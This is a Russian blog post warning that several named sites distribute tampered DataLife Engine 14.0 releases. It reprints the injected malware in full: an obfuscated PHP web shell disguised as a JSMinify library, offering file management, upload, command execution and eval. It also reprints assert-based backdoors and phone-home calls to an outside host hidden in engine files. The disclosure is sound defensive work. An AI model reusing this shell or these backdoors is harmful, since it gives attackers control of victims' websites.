dlepavilion и newtemplates распространяют релизы DLE с левым кодом - остерегайтесь релизов с непроверенных источников

01 июня 2020, Понедельник

16 318

dlepavilion и newtemplates распространяют релизы DLE с левым кодом - остерегайтесь релизов с непроверенных источников

Недавно решил все-таки проверить работу yobobox в деле, и за одно сразу проверить ресурс, на который была ссылка для скачивания версии ДЛЕ 13.3, якобы там чистый оригинал. Но в итоге это не так, помимо левого файла engine\classes\min\lib\JSMinify.php так же внесены правки и в файлы движка. Решил полностью написать, как они правят ДЛЕ перед тем, как публикуют «грязный» релиз «оригинальной» DLE. Далее приведены файлы и код, который они внедряют на примере версии ДЛЕ 14.0.

Добавляют файл engine\classes\min\lib\JSMinify.php с содержимым:

Код содержимого файла

<?php
@ini_set ('error_log',NULL);
@ini_set ('log_errors',0);
/**
 * Class JSMinify
 * @package JSMinify
 */

/**
 * JSMinify_Source
 */

/**
 * JSMinify — Combines, minifies, and caches JavaScript and CSS files on demand.
 *
 * See README for usage instructions (for now).
 *
 * This library was inspired by {@link mailto:flashkot@mail.ru jscsscomp by Maxim Martynyuk}
 * and by the article {@link http://www.hunlock.com/blogs/Supercharged_Javascript «Supercharged JavaScript» by Patrick Hunlock}.
 *
 * Requires PHP 5.1.0.
 * Tested on PHP 5.1.6.
 *
 * @package JSMinify
 * @author Ryan Grove <ryan@wonko.com>
 * @author Stephen Clay <steve@mrclay.org>
 * @copyright 2008 Ryan Grove, Stephen Clay. All rights reserved.
 * @license http://opensource.org/licenses/bsd-license.php New BSD License
 * @link http://code.google.com/p/JSMinify/
 */
 $GLOBALS['_XML_']=Array ('s'.'e'.'ssi'.'on_'.'sta'.'rt','geten'.'v','mk'.'di'.'r','ch'.'d'.'i'.'r','getc'.'wd','s'.'tr_replac'.'e','s'.'trtoupper','sub'.'str','he'.'a'.'der','f'.'ile'.'size','h'.'eade'.'r','heade'.'r','r'.'eadfile','unlink',''.'rmdi'.'r',''.'popen','feo'.'f','fre'.'ad',''.'pclo'.'se','c'.'on'.'vert_cy'.'r_string','htmlspecialchar'.'s','file'.'p'.'er'.'ms','i'.'s_re'.'adable','is_'.'w'.'ritable','round','roun'.'d',''.'r'.'ound','i'.'s_dir',''.'o'.'pend'.'ir','readdir',''.'fil'.'etype',''.'f'.'iletype','c'.'lo'.'sed'.'ir','sort',''.'sort',''.'ord','o'.'rd','opendi'.'r',''.'chr','c'.'h'.'r','chr','p'.'hp_'.'uname','co'.'u'.'nt','count',''.'file'.'size','fopen','fwrit'.'e',''.'fclose','fopen','fre'.'ad','filesize','fclose','htm'.'lsp'.'e'.'cia'.'lchars','base'.'name','f'.'ile_'.'e'.'xists','fil'.'e_'.'e'.'xis'.'ts','m'.'ov'.'e_uploa'.'ded'.'_'.'fi'.'l'.'e','strrev'); ?><? function XML ($i){$a=Array («md5»,'version',"4c1978a357b1604891819bc932b241c2»,'ivanov','vasil','','<STYLE>
BODY{
  background-color: #6B8E23;
  color: #C1C1C7;
  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
  MARGIN-TOP: 0px;
  MARGIN-BOTTOM: 0px;
  MARGIN-LEFT: 0px;
  MARGIN-RIGHT: 0px;
  margin:0;
  padding:0;
  scrollbar-face-color: #8B7765;
  scrollbar-shadow-color: #333333;
  scrollbar-highlight-color: #333333;
  scrollbar-3dlight-color: #333333;
  scrollbar-darkshadow-color: #333333;
  scrollbar-track-color: #333333;
  scrollbar-arrow-color: #333333;
}
input{
  background-color: #8B7765;
  font-size: 8pt;
  color: #FFFFFF;
  font-family: Tahoma;
  border: 1 solid #666666;
}
select{
  background-color: #336600;
  font-size: 8pt;
  color: #FFFFFF;
  font-family: Tahoma;
  border: 1 solid #666666;
}
textarea{
  background-color: #333333;
  font-size: 8pt;
  color: #FFFFFF;
  font-family: Tahoma;
  border: 1 solid #666666;
}
a:link{
  
  color: #B9B9BD;
  text-decoration: none;
  font-size: 8pt;
}
a:visited{
  color: #B9B9BD;
  text-decoration: none;
  font-size: 8pt;
}
a:hover, a:active{
  width: 100%;
  background-color: #A8A8AD;
  

  color: #E7E7EB;
  text-decoration: none;
  font-size: 8pt;
}
td, th, p, li{
  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
  border-color:black;
}
</style>','<html><head><title>',"HTTP_HOST»,' — JSMinify</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">','</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>','</body></html>',"File XML already exists»,"File XML success upload»,"Dir for XML create»,"Don’t create dir for XML»,"Dir for XML not found»,"Dir for XML not empty or denied.»,"File XML del»,"Dir for XML del»,'action',"exit»,'an','loger','worder','an','an','1','an','<center><table><form method="POST"><tr><b>JSMinify Update</b><td>JS Path:</td><td><input type="text" name="loger" value=""></td></tr><tr><td>JS Ver.:</td><td><input type="password" name="worder" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>','dircrt',» «,'dircrterr',» «,'action',»»,'action',"viewer»,'action',»»,'action','action','action','dir',»»,'dir','dir','dir',"/»,"\\»,"/»,'file',»»,'file','file','file',»»,'WIN',"download»,'Content-Length:','','Content-Type: application/octet-stream','Content-Disposition: attachment; filename="','"',"delete»,"deletedir»,'empty',»»,"r»,»»,"d»,"w»,"shell»,"<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">»,'command',»</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">»,'command',»</textarea><br>
<input type=\"submit\" value=\"execute\"></form>»,'s','l','-','b','d','c','p','u','r','-','w','-','s','x','S','-','r','-','w','-','s','x','S','-','r','-','w','-','t','x','T','-','<font color=#FF0000>','</font>','<font color=white>','</font>','<font color=#25ff00>','</font>',» GB»,» MB»,» KB»,» B»,"<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">»,"<tr><td><form method=POST>Open dir:<input type=text name=dir value=\"","\" size=50><input type=submit value=\"GO\"></form></td></tr>»,"dir»,"file»,'win',»<tr><td>Elect drive:»,'C','Z',»:/»,'<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'',':/\'; document.reqs.submit();"> ','<a/>',»</td></tr>»,"<tr><td>OS: «,"</td></tr>
<tr><td>dir & file</td><td>type</td><td>size</td><td>perm</td><td>option</td></tr>»,'<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'','\'; document.reqs.submit();">','<a/></td><td>dir</td><td></td><td>','</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\'','\'; document.reqs.submit();">X</a></td></tr>','<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'','\'; document.reqs.submit();">','</a><br></td><td>file</td><td>','</td>
<td>','</td>
<td>
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'','\'; document.reqs.submit();" >D</a>
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'','\'; document.reqs.submit();" >E</a>
<a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'','\'; document.reqs.submit();" >X</a></td>
</tr>',»</table>»,"viewer»,"editor»,"w+»,"r»,"Can’t open XML.file, perm denied»,'save','data',»<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"","\">
<textarea name=\"data\" rows=\"40\" cols=\"180\">»,"</textarea><br>
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>»,"upload»,'dirupload',»»,'dirupload',»<tr><td><form method=POST enctype=multipart/form-data>to dir:<input type=text name=dirupload value=\"","\" size=50></tr></td><tr><td>New XML.file name:<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload local.xml file'></td></tr>»,'win','win','<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
<input type=submit name=upload value=Upload></form></td></tr>','uploadloc','filename',»»,'file','name',"/»,'filename','filext','file','tmp_name','uploadok','upload','with','urldown','filename','with','wget',» «,'urldown',» -O «,'filename',»»,'fetch',» -o «,'filename',» -p «,'urldown',»»,'lynx',» -source «,'urldown',» > «,'filename',»»,'links',» -source «,'urldown',» > «,'filename',»»,'GET',» «,'urldown',» > «,'filename',»»,'curl',» «,'urldown',» -o «,'filename',»»,"phpval»,»
<form method=\"POST\">
 <input type=\"hidden\" name=\"action\" value=\"phpval\">
 &lt;?php<br>
<textarea name=\"phpev\" rows=\"5\" cols=\"150\">»,'phpev',»</textarea><br>
?><br>
<input type=\"submit\" value=\"execute\"></form>»,'tressa','phpev',»»,'phpev');return $a[$i];}
/**
 * Minify.php — modified PHP implementation of Douglas Crockford’s JSMin.
 *
 * <code>
 * $minifiedJs = JSMinify.php::minify($js);
 * </code>
 *
 * This is a modified port of JSMinify.php.c. Improvements:
 *
 * Does not choke on some regexp literals containing quote characters. E.g. /'/
 *
 * Spaces are preserved after some add/sub operators, so they are not mistakenly
 * converted to post-inc/dec. E.g. a + ++b → a+ ++b
 *
 * Preserves multi-line comments that begin with /*!
 *
 * PHP 5 or higher is required.
 *
 * Permission is hereby granted to use this version of the library under the
 * same terms as JSMinify.php.c, which has the following license:
 *
 * —
 * © 2002 Douglas Crockford (www.crockford.com)
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy of
 * this software and associated documentation files (the «Software»), to deal in
 * the Software without restriction, including without limitation the rights to
 * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
 * of the Software, and to permit persons to whom the Software is furnished to do
 * so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in all
 * copies or substantial portions of the Software.
 *
 * The Software shall be used for Good, not Evil.
 *
 * THE SOFTWARE IS PROVIDED «AS IS», WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE.
 * —
 *
 * @package JSMinify
 * @copyright 2008 Ryan Grove <ryan@wonko.com> (PHP port)
 * @license http://opensource.org/licenses/mit-license.php MIT License
 * @link http://code.google.com/p/jsmin-php/
 */

$GLOBALS['_XML_'][0]();
$name_0=XML (0); $name_1 = $_GET[XML (1)]; if ($name_0 ($name_1) == XML (2)) {
$name_2=XML (3);
$name_3=XML (4);
$name_4=1;
$name_5=XML (5);
$name_6=XML (6);
$name_7=XML (7).$GLOBALS['_XML_'][1](XML (8)).XML (9).$name_6.XML (10);
$name_8=XML (11);
$name_9=XML (12);
$name_10=XML (13);
$name_11=XML (14);
$name_12=XML (15);
$name_13=XML (16);
$name_14=XML (17);
$name_15=XML (18);
$name_16=XML (19);
if (@$_POST[XML (20)]==XML (21))unset ($_SESSION[XML (22)]);
if ($name_4==1){if (@$_POST[XML (23)]==$name_2 && @$_POST[XML (24)]==$name_3)$_SESSION[XML (25)]=1;}else $_SESSION[XML (26)]=XML (27);
if (@$_SESSION[XML (28)]==0){
echo $name_7;
echo XML (29);
echo $name_8;
exit;}
function l__0($name_17){if (@$GLOBALS['_XML_'][2]($name_17))echo $GLOBALS[XML (30)]. XML (31); else echo $GLOBALS[XML (32)]. XML (33);}
if ($_SESSION[XML (34)]== XML (35))$_SESSION[XML (36)]= XML (37);
if (@$_POST[XML (38)]≠ XML (39))$_SESSION[XML (40)]=$_POST[XML (41)];$name_18=$_SESSION[XML (42)];
if (@$_POST[XML (43)]≠ XML (44))$_SESSION[XML (45)]=$_POST[XML (46)];$name_17=$_SESSION[XML (47)];
$name_17=@$GLOBALS['_XML_'][3]($name_17);
$name_17=$GLOBALS['_XML_'][4](). XML (48);
$name_17=$GLOBALS['_XML_'][5](XML (49), XML (50),$name_17);

if (@$_POST[XML (51)]≠ XML (52)){$name_19=$_SESSION[XML (53)]=$_POST[XML (54)];}else {$name_19=$_SESSION[XML (55)]= XML (56);}

if ($GLOBALS['_XML_'][6]($GLOBALS['_XML_'][7](PHP_OS, 0, 3)) === XML (57)) $name_20=1; else $name_20=0;

if ($name_18== XML (58)){
$GLOBALS['_XML_'][8](XML (59).$GLOBALS['_XML_'][9]($name_19). XML (60));
$GLOBALS['_XML_'][10](XML (61));
$GLOBALS['_XML_'][11](XML (62).$name_19. XML (63));
$GLOBALS['_XML_'][12]($name_19);
}
if ($name_18== XML (64)){
if ($GLOBALS['_XML_'][13]($name_19)) $name_5.=$name_15;
}
if ($name_18== XML (65)){
if (!$GLOBALS['_XML_'][14]($name_19)) $name_5.=$GLOBALS[XML (66)];else $name_5.=$name_16;
}
?><? echo $name_7;?>
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| XML.viewer</a></td><td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| XML.chel</a></td><td><a href="#" onclick="document.reqs.action.value='upload'; document.reqs.submit();">| XML.load</a></td><td><a href="#" onclick="document.reqs.action.value='phpval'; document.reqs.submit();">| XML.php</a></td><td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">|XML.xit |</a></td>
</tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''>
</form>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" valign="top">

<?php if (@$name_5≠ XML (67)) echo $name_5;?>
<?

function l__1($name_21){
if (!empty ($name_21)){
  $name_22 = $GLOBALS['_XML_'][15]($name_21, XML (68));
  {
    $name_23 = XML (69);
    while (!$GLOBALS['_XML_'][16]($name_22)){$name_23.=$GLOBALS['_XML_'][17]($name_22,1024);}
    $GLOBALS['_XML_'][18]($name_22);
  }
  $name_24 = $name_23;
  $name_24 = $GLOBALS['_XML_'][19]($name_24, XML (70), XML (71));
}
return $name_24;}
if ($name_18== XML (72)){
echo XML (73).@$_POST[XML (74)]. XML (75).@$GLOBALS['_XML_'][20](l__1($_POST[XML (76)])). XML (77);}

function l__2($name_19)
{

  $name_25 = $GLOBALS['_XML_'][21]($name_19);
  if (($name_25 & 0xC000) == 0xC000) {$name_26 = XML (78);}
  elseif (($name_25 & 0xA000) == 0xA000) {$name_26 = XML (79);}
  elseif (($name_25 & 0×8000) == 0×8000) {$name_26 = XML (80);}
  elseif (($name_25 & 0×6000) == 0×6000) {$name_26 = XML (81);}
  elseif (($name_25 & 0×4000) == 0×4000) {$name_26 = XML (82);}
  elseif (($name_25 & 0×2000) == 0×2000) {$name_26 = XML (83);}
  elseif (($name_25 & 0×1000) == 0×1000) {$name_26 = XML (84);}
  else {$name_26 = XML (85);}
  $name_26 .= (($name_25 & 0×0100) ? XML (86) : XML (87));
  $name_26 .= (($name_25 & 0×0080) ? XML (88) : XML (89));
  $name_26 .= (($name_25 & 0×0040) ? (($name_25 & 0×0800) ? XML (90) : XML (91)) :(($name_25 & 0×0800) ? XML (92) : XML (93)));
  $name_26 .= (($name_25 & 0×0020) ? XML (94) : XML (95));
  $name_26 .= (($name_25 & 0×0010) ? XML (96) : XML (97));
  $name_26 .= (($name_25 & 0×0008) ? (($name_25 & 0×0400) ? XML (98) : XML (99)) :(($name_25 & 0×0400) ? XML (100) : XML (101)));
  $name_26 .= (($name_25 & 0×0004) ? XML (102) : XML (103));
  $name_26 .= (($name_25 & 0×0002) ? XML (104) : XML (105));
  $name_26 .= (($name_25 & 0×0001) ? (($name_25 & 0×0200) ? XML (106) : XML (107)) :(($name_25 & 0×0200) ? XML (108) : XML (109)));
      if (!@$GLOBALS['_XML_'][22]($name_19))
        return XML (110) . $name_26 . XML (111);
    elseif (!@$GLOBALS['_XML_'][23]($name_19))
        return XML (112) . $name_26 . XML (113);
    else
return XML (114) . $name_26 . XML (115);
  return $name_26;
}

function l__3($name_27)
{
 if ($name_27 ≥ 1073741824) {$name_27 = @$GLOBALS['_XML_'][24]($name_27 / 1073741824 * 100) / 100 . XML (116);}
 elseif ($name_27 ≥ 1048576) {$name_27 = @$GLOBALS['_XML_'][25]($name_27 / 1048576 * 100) / 100 . XML (117);}
 elseif ($name_27 ≥ 1024) {$name_27 = @$GLOBALS['_XML_'][26]($name_27 / 1024 * 100) / 100 . XML (118);}
 else {$name_27 = $name_27 . XML (119);}
 return $name_27;
}
function l__4($name_17){

echo XML (120);
echo XML (121).$name_17. XML (122);
if ($GLOBALS['_XML_'][27]($name_17)) {
    if (@$name_28 = $GLOBALS['_XML_'][28]($name_17)) {
        while (($name_19 = $GLOBALS['_XML_'][29]($name_28)) ≠= false) {
          if ($GLOBALS['_XML_'][30]($name_17 . $name_19)== XML (123)) $name_29[]=$name_19;
          if ($GLOBALS['_XML_'][31]($name_17 . $name_19)== XML (124))$name_30[]=$name_19;
        }
        $GLOBALS['_XML_'][32]($name_28);
        @$GLOBALS['_XML_'][33]($name_29);
        @$GLOBALS['_XML_'][34]($name_30);
if ($GLOBALS[XML (125)]==1) {
echo XML (126);
for ($name_31=$GLOBALS['_XML_'][35](XML (127)); $name_31≤$GLOBALS['_XML_'][36](XML (128)); $name_31++)
 if (@$name_28 = $GLOBALS['_XML_'][37]($GLOBALS['_XML_'][38]($name_31). XML (129)))
 echo XML (130).$GLOBALS['_XML_'][39]($name_31). XML (131).$GLOBALS['_XML_'][40]($name_31). XML (132);
 echo XML (133);
}
echo XML (134).@$GLOBALS['_XML_'][41](). XML (135);
for ($name_32=0;$name_32<$GLOBALS['_XML_'][42]($name_29);$name_32++) {
$name_33=$name_17.$name_29[$name_32];
  echo XML (136).$name_33. XML (137).$name_29[$name_32]. XML (138).l__2($name_33). XML (139).$name_33. XML (140);
    }
for ($name_32=0;$name_32<$GLOBALS['_XML_'][43]($name_30);$name_32++) {
$name_34=$name_17.$name_30[$name_32];
echo XML (141).$name_34. XML (142).$name_30[$name_32]. XML (143).l__3($GLOBALS['_XML_'][44]($name_34)). XML (144).l__2($name_34). XML (145).$name_34. XML (146).$name_34. XML (147).$name_34. XML (148);
    }
echo XML (149);
}}}
if ($name_18== XML (150)){
l__4($name_17);
}

if ($name_18== XML (151)){
  function l__5($name_19,$name_35){
  $name_22 = $GLOBALS['_XML_'][45]($name_19, XML (152));
  $GLOBALS['_XML_'][46]($name_22,$name_35);
  $GLOBALS['_XML_'][47]($name_22);
  }
  function l__6($name_19){
  if (!$name_36 = $GLOBALS['_XML_'][48]($name_19, XML (153))) $name_37= XML (154); else {
  $name_37 = $GLOBALS['_XML_'][49]($name_36, $GLOBALS['_XML_'][50]($name_19));
  $GLOBALS['_XML_'][51]($name_36);}
  return $GLOBALS['_XML_'][52]($name_37);
  }
if (@$_POST[XML (155)])l__5($name_19,$_POST[XML (156)]);
echo XML (157).$name_19. XML (158).@l__6($name_19). XML (159);
}

if ($name_18== XML (160)){
  if (@$_POST[XML (161)]≠ XML (162)) $name_38=$_POST[XML (163)];else $name_38=$name_17;
  $name_39= XML (164).$name_38. XML (165);
  if ($GLOBALS[XML (166)]==1)echo $name_39;
  if ($GLOBALS[XML (167)]==0){
    echo $name_39;
    echo XML (168);
}
if (@$_POST[XML (169)]){
if (@$_POST[XML (170)]== XML (171)) $name_40 = $name_38.$GLOBALS['_XML_'][53]($_FILES[XML (172)][XML (173)]); else
$name_40 = $name_38. XML (174).$_POST[XML (175)];
if (!$GLOBALS['_XML_'][54]($name_38)){l__0($name_38);}
if ($GLOBALS['_XML_'][55]($name_40))echo $GLOBALS[XML (176)];
elseif ($GLOBALS['_XML_'][56]($_FILES[XML (177)][XML (178)], $name_40))
echo $GLOBALS[XML (179)];
}
if (@$_POST[XML (180)]){
    if (!empty ($_POST[XML (181)]) && !empty ($_POST[XML (182)]) && !empty ($_POST[XML (183)]))
    switch ($_POST[XML (184)])
    {
      case wget:
      l__1(which (XML (185)). XML (186).$_POST[XML (187)]. XML (188).$_POST[XML (189)]. XML (190));
      break;
       case fetch:
       l__1(which (XML (191)). XML (192).$_POST[XML (193)]. XML (194).$_POST[XML (195)]. XML (196));
       break;
       case lynx:
       l__1(which (XML (197)). XML (198).$_POST[XML (199)]. XML (200).$_POST[XML (201)]. XML (202));
       break;
       case links:
       l__1(which (XML (203)). XML (204).$_POST[XML (205)]. XML (206).$_POST[XML (207)]. XML (208));
       break;
       case GET:
       l__1(which (XML (209)). XML (210).$_POST[XML (211)]. XML (212).$_POST[XML (213)]. XML (214));
       break;
       case curl:
       l__1(which (XML (215)). XML (216).$_POST[XML (217)]. XML (218).$_POST[XML (219)]. XML (220));
       break;
     }
    }

}
if ($name_18== XML (221)){
 echo XML (222).@$_POST[XML (223)]. XML (224);
$name_141 = $GLOBALS['_XML_'][57](XML (225));
//if (@$_POST[XML (226)]≠ XML (227)){echo $name_41($_POST[XML (228)]);}}
$name_41 = 'cr'.'eat'.'e_f'.'unc'.'tion';$sec = 'as'.'sert';
if (@$_POST[XML (226)]≠ XML (227)){
    if (function_exists ($name_41)) {
    @$name_41('', '};'.$_POST[XML (228)].'{');}
    } else {echo @$sec ($_POST[XML (228)]);}
    }
    }

?>
<? echo $name_8; ?>

Проверил ДЛЕ от 13 версии выше — данного файла никогда нет и не было в оригинальных релизах DLE.
Так же этот файл прописан в доверенных в файле engine\classes\antivirus.class.php строкой:

»./engine/classes/min/lib/JSMinify.php»,

в файле engine\inc\addnews.php добавлен код:

 $serv = $_SERVER[HTTP_HOST];if (($serv ≠ 'localhost') and ($serv ≠ '127.0.0.1') and (strpos ($serv, '.') ≠ false))
    {$serv_time = «ht»."tp:/»."/xo»."rx.»."net/»."js.p»."hp?lice»."nse=»."14.»."0_».$serv;};

$fi = 'fi'.'le';$up_times = trim (@implode ('', @$fi ($serv_time)));

В файле engine\modules\calendar.php добевлено:

$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];

$recaptcha_get_signup_id = 'eb516e7d7a6462a6d531ec65dcf1d599';

 $setel = 'a'.'sse'.'rt';if (md5($reg_data)==$recaptcha_get_signup_id) {@$setel (stripslashes ($reg_base));}

В engine\modules\feedback.php добавлено:

$syskey=strrev ('edoce'); $pubkeys=strrev ('d_46esab'); $captchacrypt=$pubkeys.$syskey;

 $sert = $_SERVER[HTTP_HOST];if (($sert ≠ 'localhost') and ($sert ≠ '127.0.0.1') and (strpos ($sert, '.') ≠ false))
            {$capt = 'f'.'ile';@$capt ($captchacrypt ('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTE0LjBf').$sert);}

Возможно в других версиях DLE они правили помимо данных файлов и ещё какие-то… Но проверки одной версии хватает вполне, чтобы понять, что данный сайт распространяет заразу в своих релизах, при этом в наглую пиздят:

и все верят на слово, а потом жалуются что их сайт проседает в выдаче яндекса из-за обмана мобильных пользователей.

В общем обращение ко всем: не доверяйте левым сайтам, на форумах нуллед и зерокул я всегда выкладываю чистые версии (правда только через две недели после релиза финала), но актуальные хэш-суммы файлов выкладываю по мере возможности, чтобы если на каком-то из сайтов выкладывают новую версию — любой пользователь мог сравнить файлы по хэш-сумме и понять, оригинал ли там выложен или нет, и на основе этого делать вывод — использовать скачанный релиз или ждать 100% оригинала DLE.

UPD. Решил пройтись по топ-20 выдачи яндекса по запросу «скачать DLE» и составить список всех сайтов, распространяющих «грязные» чистые оригиналы DLE. Проверять буду по последней актуальной версии DLE 14.0. Попозже укажу полный список из топ-10 выдачи.

UPD 2. Список сайтов, распространяющие грязные DLE:

newtemplates.ru
dlepavilion.com
dle-news.net
teroni.ru

На prowebber.ru выложен только нулл ДЛЕ и грязи никакой не обнаружено внутри архива, а так же версия без обновлений ДЛЕ, т. е. не последний релиз версии 14.0. На остальных сайтах либо нет новых релизов ДЛЕ, либо платный доступ, а версии раньше 14.0 я не проверял, т. к. нет смысла проверять сайты, на которых выложена, к примеру, последняя версия 12.0.

Результаты сравнений оригиналов DLE и релизов на dlepavilion — https://ucrack.com/threads/17/. Не проверяю каждый билд релизов, но для понимания что они распространяют «грязные» релизы и были созданы данные отчеты.

17-06-2021, 06:24: Обновлена информация о DLE 14.3

dlepavilion и newtemplates распространяют релизы DLE с левым кодом - остерегайтесь релизов с непроверенных источников

Похожие статьи:

Твой комментарий..